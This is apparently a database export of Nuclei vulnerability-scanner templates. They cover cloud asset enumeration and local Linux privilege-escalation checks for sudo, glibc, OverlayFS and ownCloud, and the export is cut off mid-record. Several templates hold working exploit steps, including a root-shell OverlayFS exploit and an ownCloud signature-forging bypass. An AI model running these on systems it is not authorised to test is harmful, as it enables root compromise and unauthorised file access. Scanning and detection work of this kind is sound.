[{ "_id": { "$oid": "66477a413521042ccf307c23" }, "name": "aws-app-enum.yaml", "content": "id: aws-app-enum\n\ninfo:\n name: AWS Apps - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for AWS apps (WorkDocs, WorkMail, Connect, etc.)\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,cloud-enum,aws\n\nself-contained: true\n\nvariables:\n BaseDNS: \"awsapps.com\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: status\n name: \"Registered AWS App\"\n status:\n - 200\n - 302\n condition: or\n# digest: 490a0046304402200ead17d9381546ddc9f16663c90d8511969313ccc238f43ffde6040eb1190a3e02204f529c738530581af958cd8d83110cdb30cfc8f14818c8a379fb398f975045f8:922c64590222798bb761d5b6d8e72950", "hash": "da1370cd96eea5e35c4e67da1d0224cd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c24" }, "name": "aws-s3-bucket-enum.yaml", "content": "id: aws-s3-bucket-enum\n\ninfo:\n name: AWS S3 Buckets - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for open and protected buckets in AWS S3\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,cloud-enum,aws\n\nself-contained: true\n\nvariables:\n BaseDNS: \"s3.amazonaws.com\"\n\nhttp:\n - raw:\n - |\n GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers-condition: or\n matchers:\n - type: status\n name: \"Open AWS S3 Bucket\"\n status:\n - 200\n\n - type: status\n name: \"Protected AWS S3 Bucket\"\n status:\n - 403\n# digest: 4a0a004730450220582ade4cedc87128700ecd6eabbf8180f003175a526353e667cd067c00860403022100dadcb4551ca3a0cefd88cb78fa0de85020778f6b3c85f7792aee521e3c8adfaf:922c64590222798bb761d5b6d8e72950", "hash": "3e224ade18b918ecb3d343fc1ac90ddb", "level": 2, "time": 
"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c25" }, "name": "azure-db-enum.yaml", "content": "id: azure-db-enum\n\ninfo:\n name: Azure Databases - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Azure databases via their registered DNS names\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,cloud-enum,azure\n\nself-contained: true\n\nvariables:\n BaseDNS: \"database.windows.net\"\n\ndns:\n - name: \"{{wordlist}}.{{BaseDNS}}\"\n type: A\n class: inet\n\n recursion: true\n\n attack: batteringram\n matchers:\n - type: word\n part: answer\n words:\n - \"IN\\tA\"\n# digest: 4a0a0047304502206a999e317308128dc9a9f3114f003b2c29cad9f569d6922502a8ac90971cf927022100c4fe9eea1496997e9ef66f8a46c2ece4bd511dede88aaf58d36410be3f2cc758:922c64590222798bb761d5b6d8e72950", "hash": "7668daf3eeacc6f6178f457f7793fc0a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c26" }, "name": "azure-vm-cloud-enum.yaml", "content": "id: azure-vm-cloud-enum\n\ninfo:\n name: Azure Virtual Machines - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Azure virtual machines via their registered DNS names.\n metadata:\n verified: true\n max-request: 1\n tags: cloud,cloud-enum,azure,fuzz,enum\n\nself-contained: true\n\nvariables:\n BaseDNS: \"cloudapp.azure.com\"\n regionname:\n - eastasia\n - southeastasia\n - centralus\n - eastus\n - eastus2\n - westus\n - northcentralus\n - southcentralus\n - northeurope\n - westeurope\n - japanwest\n - japaneast\n - brazilsouth\n - australiaeast\n - australiasoutheast\n - southindia\n - centralindia\n - westindia\n - canadacentral\n - canadaeast\n - uksouth\n - ukwest\n - westcentralus\n - westus2\n - koreacentral\n - koreasouth\n - francecentral\n - francesouth\n - australiacentral\n - australiacentral2\n - southafricanorth\n - southafricawest\n\ndns:\n - name: \"{{wordlist}}.{{regionname}}.{{BaseDNS}}\"\n type: A\n 
class: inet\n\n recursion: true\n\n attack: batteringram\n\n matchers:\n - type: word\n part: answer\n words:\n - \"IN\\tA\"\n# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950", "hash": "62672f03d5615191ba7f8677a454e234", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c27" }, "name": "azure-website-enum.yaml", "content": "id: azure-website-enum\n\ninfo:\n name: Azure Websites - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Azure websites that are registered and responding.\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,azure\n\nself-contained: true\n\nvariables:\n BaseDNS: \"azurewebsites.net\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: status\n name: \"Available Azure Website\"\n status:\n - 200\n - 302\n condition: or\n# digest: 4a0a0047304502201886de38da3a1bc0e95ff00b7cbf1e6cb0ef6f13197aa042a25d3a4f1ee588ad022100e067b58657d10e3b2d41283022c15120ed1d17f20d58b821418e953bfbfe2b0f:922c64590222798bb761d5b6d8e72950", "hash": "213edbdfa78256665fb3ce8c830a31f2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c28" }, "name": "gcp-app-engine-enum.yaml", "content": "id: gcp-app-engine-enum\n\ninfo:\n name: GCP App Engine (Appspot) - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for App Engine Apps in GCP.\n metadata:\n verified: true\n max-request: 1\n tags: enum,cloud,cloud-enum,gcp\n\nself-contained: true\n\nvariables:\n BaseDNS: \"appspot.com\"\n loginRedirect: \"accounts.google.com\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n 
attack: batteringram\n threads: 10\n\n matchers:\n - type: dsl\n name: \"Open GCP App Engine App\"\n dsl:\n - \"status_code==200\"\n\n - type: dsl\n name: \"Protected GCP App Engine App\"\n dsl:\n - \"status_code==302\"\n - contains(location, \"login\")\n condition: and\n# digest: 490a00463044022049b2ab788a102342c3ee4b36d87315f145c3e963f1bd8389d1b2d9f90540f05402203bb1fa138a4e29c568c6bd421cb97c526e822c25fc952368295259787bc159d4:922c64590222798bb761d5b6d8e72950", "hash": "e9be701ba0367556336e1bac2300ccca", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c29" }, "name": "gcp-bucket-enum.yaml", "content": "id: gcp-bucket-enum\n\ninfo:\n name: GCP Buckets - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for open and protected buckets in GCP.\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,cloud-enum,gcp\n\nself-contained: true\n\nvariables:\n BaseDNS: \"storage.googleapis.com\"\n\nhttp:\n - raw:\n - |\n GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: status\n name: \"Open GCP Bucket\"\n status:\n - 200\n\n - type: status\n name: \"Protected GCP Bucket\"\n status:\n - 403\n# digest: 4a0a00473045022038ad1830fc8e77debc4c9fcab4d7eb4c62b9930c3f98860f5e6877c1e72578a4022100e3ea9b5730d32e9219e4716c79b5203733ff802460ee921d0f0c2199ecca7989:922c64590222798bb761d5b6d8e72950", "hash": "bed4f0f05be71ff100b570ac4b7d6ebc", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2a" }, "name": "gcp-firebase-app-enum.yaml", "content": "id: gcp-firebase-app-enum\n\ninfo:\n name: GCP Firebase Apps - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Firebase Apps in GCP.\n metadata:\n verified: true\n max-request: 1\n tags: enum,cloud,cloud-enum,gcp\n\nself-contained: true\n\nvariables:\n BaseDNS: 
\"firebaseapp.com\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: status\n name: \"Open GCP Firebase App\"\n status:\n - 200\n# digest: 4a0a0047304502202cb00f1926f91f36e3db3668c74866756cfda2081ea2a15ae99606c13542a8d3022100e57e4412254764ae84c84ff3fbf3932c79895e187f380a33749e25519df189f5:922c64590222798bb761d5b6d8e72950", "hash": "b64e097c51c058ce01d98468867e5af2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2b" }, "name": "gcp-firebase-rtdb-enum.yaml", "content": "id: gcp-firebase-rtdb-enum\n\ninfo:\n name: GCP Firebase Realtime Database - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Firebase Realtime Databases in GCP.\n metadata:\n verified: true\n max-request: 1\n tags: enum,cloud,cloud-enum,gcp\n\nself-contained: true\n\nvariables:\n BaseDNS: \"firebaseio.com\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}}/.json HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers-condition: or\n matchers:\n - type: status\n name: \"Open GCP Firebase RTDB\"\n status:\n - 200\n\n - type: status\n name: \"Protected GCP Firebase RTDB\"\n status:\n - 401\n\n - type: status\n name: \"Payment GCP on Google Firebase RTDB\"\n status:\n - 402\n\n - type: status\n name: \"Deactivated GCP Firebase RTDB\"\n status:\n - 423\n# digest: 4b0a00483046022100c5f895d4aa3a88d0917500200d33cf6c779e563a27cfcb1c1849c6740af720b30221009b12087b38af6b723bd3add8f08dd28e76b18133a03396b5d1af3693bfbdcecc:922c64590222798bb761d5b6d8e72950", "hash": "fbffebf468c007db46d657a3a1c0c632", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2c" }, "name": "CVE-2019-14287.yaml", "content": "id: CVE-2019-14287\n\ninfo:\n name: Sudo <= 1.8.27 - Security Bypass\n author: daffainfo\n 
severity: high\n description: |\n In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a \"sudo -u \\#$((0xffffffff))\" command.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287\n - https://www.exploit-db.com/exploits/47502\n - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html\n - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html\n - http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2019-14287\n cwe-id: CWE-755\n epss-score: 0.30814\n epss-percentile: 0.96854\n cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: sudo_project\n product: sudo\n tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo -u#-1 whoami\n\n matchers:\n - type: dsl\n dsl:\n - '!contains(code_1_response, \"root\")'\n - 'contains(code_2_response, \"root\")'\n condition: and\n# digest: 4a0a0047304502204e166f9afc32a9e3f2aa20cf10f4dc7c4ccc6d9ecfb25279db42ee4884fd9a09022100e24c0145e3cb670939ecba31b847513224c52277827290d7358cd3b5e8531825:922c64590222798bb761d5b6d8e72950", "hash": "c35ca732bcdee45595ae96f18ecf8932", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2d" }, "name": "CVE-2021-3156.yaml", "content": "id: CVE-2021-3156\n\ninfo:\n name: Sudo Baron Samedit - Local Privilege Escalation\n author: pussycat0x\n severity: high\n description: |\n Sudo before 1.9.5p2 contains an off-by-one error that can 
result in a heap-based buffer overflow, which allows privilege escalation to root via \"sudoedit -s\" and a command-line argument that ends with a single backslash character.\n reference:\n - https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435\n - https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\n - https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff\n - http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html\n - http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2021-3156\n cwe-id: CWE-193\n epss-score: 0.97085\n epss-percentile: 0.99757\n cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n vendor: sudo_project\n product: sudo\n tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n sudoedit -s '\\' $(python3 -c 'print(\"A\"*1000)')\n\n matchers:\n - type: word\n words:\n - \"malloc(): memory corruption\"\n - \"Aborted (core dumped)\"\n condition: and\n# digest: 4a0a0047304502204de6d29ee97c296f1046225fd664237cb80c163370f316bfa2c0174718fa0654022100cbd49f46b75314934af75dde946dbe4a3d135d87368f2dead3b9b2fa40bb839b:922c64590222798bb761d5b6d8e72950", "hash": "c694cd382462ab55990b9c6ee1f1091c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2e" }, "name": "CVE-2023-2640.yaml", "content": "id: CVE-2023-2640\n\ninfo:\n name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel\n author: princechaddha\n severity: high\n description: |\n A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. 
This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.\n impact: |\n An attacker with local access can gain elevated privileges on the affected system.\n remediation: |\n Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.\n reference:\n - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640\n - https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability\n - https://ubuntu.com/security/notices/USN-6250-1\n - https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2023-2640\n cwe-id: CWE-863\n epss-score: 0.00232\n epss-percentile: 0.60636\n cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: canonical\n product: ubuntu_linux\n tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n id\n\n - engine:\n - sh\n - bash\n source: |\n cd /tmp\n echo '#include \\n#include \\n#include \\n\\nint main() {\\n if (setuid(0) != 0) {\\n fprintf(stderr, \"\\\\x1b[31mFailed to set UID to 0.\\\\x1b[0m\\\\n\");\\n return 1;\\n }\\n\\n printf(\"Entering \\\\x1b[36mprivileged\\\\x1b[0m shell...\\\\n\");\\n if (system(\"/bin/bash -p\") == -1) {\\n fprintf(stderr, \"\\\\x1b[31mFailed to execute /bin/bash -p.\\\\x1b[0m\\\\n\");\\n return 1;\\n }\\n\\n return 0;\\n}' > test.c\n gcc test.c -o test\n unshare -rm sh -c \"mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;\"\n\n matchers:\n - type: dsl\n dsl:\n - '!contains(code_1_response, \"(root)\")'\n - 'contains(code_2_response, 
\"(root)\")'\n condition: and\n# digest: 490a004630440220115656a336b2d20b4c44fe1ade030de40d947cf0fd7fb8f8a5a910dca2ab200602205ead45f6f081b3555a7924050cd922e13d30139e64254790b1368627d59b4389:922c64590222798bb761d5b6d8e72950", "hash": "cfec3b3b0c44bd8d808d5f7b0cd562dd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2f" }, "name": "CVE-2023-49105.yaml", "content": "id: CVE-2023-49105\n\ninfo:\n name: OwnCloud - WebDAV API Authentication Bypass\n author: ChristianPoeschl,FlorianDewald,usdAG\n severity: critical\n description: |\n An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.\n reference:\n - https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/\n - https://github.com/0xfed/ownedcloud\n - https://owncloud.org/security\n - https://github.com/ambionics/owncloud-exploits\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-49105\n cwe-id: CWE-287\n epss-score: 0.21237\n epss-percentile: 0.96302\n cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: owncloud\n product: owncloud\n shodan-query: title:\"owncloud\"\n tags: cve,cve2023,code,owncloud,auth-bypass\nvariables:\n username: admin\n\ncode:\n - engine:\n - py\n - python3 # requires python to be pre-installed on system running nuclei\n source: |\n # build signature for presigned urls\n import base64, hashlib, datetime, os\n from urllib.parse import urlencode\n\n username = os.getenv('username')\n base_url = os.getenv('BaseURL')\n dav_url = 
f'{base_url}/remote.php/dav/files/{username}'\n oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n data = {\n 'OC-Expires': '991200',\n 'OC-Verb': 'PROPFIND',\n 'OC-Credential': username,\n 'OC-Date': oc_date\n }\n sig_url = f'{dav_url}?{urlencode(data)}'\n # derive signature from empty sign key\n dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)\n final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'\n #final_url = f'{sig_url}&OC-Signature={dk.hex()}'\n print(final_url)\n\nhttp:\n - raw:\n - |\n PROPFIND {{code_response}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n Authorization: Basic {{base64('{{username}}')}}\n\n matchers-condition: or\n matchers:\n - type: dsl\n name: bypass-correct-user\n dsl:\n - status_code == 207\n - contains(body, 'owncloud.org')\n condition: and\n\n - type: word\n name: bypass-wrong-user\n part: body\n words:\n - User unknown\n - Sabre\n - Exception\n - NotAuthenticated\n condition: and\n\n extractors:\n - type: dsl\n dsl:\n - '\"Username => \"+ username'\n# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950", "hash": "fb12b8267ed57508da9561b4c4d331ac", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c30" }, "name": "CVE-2023-4911.yaml", "content": "id: CVE-2023-4911\n\ninfo:\n name: Looney Tunables Linux - Local Privilege Escalation\n author: nybble04\n severity: high\n description: |\n A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. 
This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-4911\n - https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt\n - https://www.youtube.com/watch?v=1iV-CD9Apn8\n - http://www.openwall.com/lists/oss-security/2023/10/05/1\n - http://www.openwall.com/lists/oss-security/2023/10/13/11\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2023-4911\n cwe-id: CWE-787,CWE-122\n epss-score: 0.0171\n epss-percentile: 0.87439\n cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gnu\n product: glibc\n tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n env -i \"GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A\" \"Z=`printf '%08192x' 1`\" /usr/bin/su --help\n echo $?\n\n matchers:\n - type: word\n words:\n - \"139\" # Segmentation Fault Exit Code\n# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950", "hash": "f8c83690517eae753a268f613a29a995", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c31" }, "name": "CVE-2023-6246.yaml", "content": "id: CVE-2023-6246\n\ninfo:\n name: glibc's syslog - Local Privilege Escalation\n author: gy741\n severity: high\n description: |\n A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. 
This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-6246\n - https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt\n - https://access.redhat.com/security/cve/CVE-2023-6246\n - https://bugzilla.redhat.com/show_bug.cgi?id=2249053\n - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2023-6246\n cwe-id: CWE-787,CWE-122\n epss-score: 0.0077\n epss-percentile: 0.80859\n cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gnu\n product: glibc\n tags: cve,cve2023,code,glibc,linux,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n (exec -a \"`printf '%0128000x' 1`\" /usr/bin/su < /dev/null)\n echo $?\n\n matchers:\n - type: word\n words:\n - \"127\" # exit status the template expects on a vulnerable host (a bash-reported SIGSEGV would be 139); 127 is also sh's status for a command it cannot find, so confirm /usr/bin/su exists before trusting a match\n# digest: 490a0046304402204e884ed16aed759a6b31c001e50ee4aed4db45f060d3335e1b6f28935eae4135022051929119a0bf2eac944500d98af2720a6ff835dcb875f35cc6390fbdf47c8bda:922c64590222798bb761d5b6d8e72950", "hash": "944ef6f13032d6bb7990e3f547996e4c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c32" }, "name": "rw-shadow.yaml", "content": "id: rw-shadow\n\ninfo:\n name: /etc/shadow writable or readable - Privilege Escalation\n author: daffainfo\n severity: high\n reference:\n - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow\n metadata:\n verified: true\n max-request: 2\n tags: code,linux,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - 
engine:\n - sh\n - bash\n source: |\n [ -r \"/etc/shadow\" ] || [ -w \"/etc/shadow\" ] && echo \"Either readable or writable\" || echo \"Not readable and not writable\"\n\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: word\n part: code_2_response\n words:\n - \"Either readable or writable\"\n\n - type: word\n part: code_2_response\n words:\n - \"Not readable and not writable\"\n negative: true\n# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950", "hash": "c67b7de93a4863f2e7f6d282d88f2713", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c33" }, "name": "rw-sudoers.yaml", "content": "id: rw-sudoers\n\ninfo:\n name: /etc/sudoers writable or readable - Privilege Escalation\n author: daffainfo\n severity: high\n reference:\n - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#etc-sudoers-etc-sudoers.d\n metadata:\n verified: true\n max-request: 2\n tags: code,linux,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n [ -r \"/etc/sudoers\" ] || [ -w \"/etc/sudoers\" ] && echo \"Either readable or writable\" || echo \"Not readable and not writable\"\n\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: word\n part: code_2_response\n words:\n - \"Either readable or writable\"\n\n - type: word\n part: code_2_response\n words:\n - \"Not readable and not writable\"\n negative: true\n# digest: 4b0a00483046022100caa6257df894b71a7e77b620941ef821acfbf9ae0c939bab9bb60111a29be594022100fb1579caf8b9cdbcb2866aa421ee0cb34d429d2657544be9c2d8652bc196df39:922c64590222798bb761d5b6d8e72950", "hash": "5a0c165f5632a321aeff5b497c037175", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307c34" }, "name": "sudo-nopasswd.yaml", "content": "id: sudo-nopasswd\n\ninfo:\n name: Sudo NOPASSWD - Privilege Escalation\n author: daffainfo\n severity: high\n description: Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password.\n reference:\n - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#nopasswd\n metadata:\n verified: true\n tags: code,linux,sudo,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n sudo -l\n\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"(root) NOPASSWD:\"\n# digest: 4a0a00473045022100de6ba465a1014a68bf361233db593957b6412aa0496a46cc569184eedd84611702203545ae3f61902e6068aff724e05ec287f68ad332ccf73aa02ec78d1800429f24:922c64590222798bb761d5b6d8e72950", "hash": "2760830bb2c0c3a35d3fb6ce4bcc3168", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c35" }, "name": "writable-etc-passwd.yaml", "content": "id: writable-etc-passwd\n\ninfo:\n name: /etc/passwd writable - Privilege Escalation\n author: daffainfo\n severity: high\n reference:\n - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-passwd\n metadata:\n verified: true\n tags: code,linux,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n [ -w \"/etc/passwd\" ] && echo \"Writable\" || echo \"Not writable\"\n\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"Writable\"\n\n - type: word\n part: code_1_response\n words:\n - \"Not writable\"\n negative: true\n# digest: 4a0a0047304502210096579c1feb0a90bdbb55acc382213a07ed99678c1afdaa1849273657d6292d3c02200903d3d37e2aafed546ff3b5259ecaa046cac660ae9acadb109f4dc694c4a81d:922c64590222798bb761d5b6d8e72950", "hash": "6ec81c2f7b3ce1ef40bec2b550c316ad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c36" }, "name": "privesc-aa-exec.yaml", 
"content": "id: privesc-aa-exec\n\ninfo:\n name: aa-exec - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n aa-exec is used to launch a program confined by the specified profile and or namespace.\n reference:\n - https://gtfobins.github.io/gtfobins/aa-exec/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,aa-exec,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n aa-exec whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo aa-exec whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100ab308d9c3e5fbd837b8ae53da47b7f62caaa8b17838d684823649b04c05a180302203b4a417eabdb724ef1b07af57b4a15ca02f59f665442d6c145a869026e0ff3ac:922c64590222798bb761d5b6d8e72950", "hash": "675a11a47a0be08ca444642bcf4af8d5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c37" }, "name": 